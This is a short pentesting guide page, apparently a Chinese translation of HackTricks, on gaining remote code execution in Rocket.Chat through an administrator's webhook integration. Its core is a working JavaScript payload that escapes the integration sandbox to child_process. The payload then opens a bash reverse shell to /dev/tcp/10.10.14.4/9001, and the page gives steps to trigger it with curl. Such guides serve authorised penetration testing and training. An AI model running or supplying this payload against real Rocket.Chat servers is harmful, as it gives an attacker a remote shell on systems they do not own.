hacktricks/network-services-pentesting/pentesting-web/rocket-chat.md

4.4 KiB
Raw Blame History

Rocket Chat

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

RCE

如果你是Rocket Chat中的管理员你可以获得RCE。

  • 进入**Integrations并选择New Integration,然后选择任意一个:Incoming WebHookOutgoing WebHook**。
  • /admin/integrations/incoming
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
  • 配置WebHook必须存在通道和以用户名发布
  • 配置WebHook脚本
  • 保存更改
  • 获取生成的WebHook URL
  • 使用curl调用它您应该收到反向shell
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥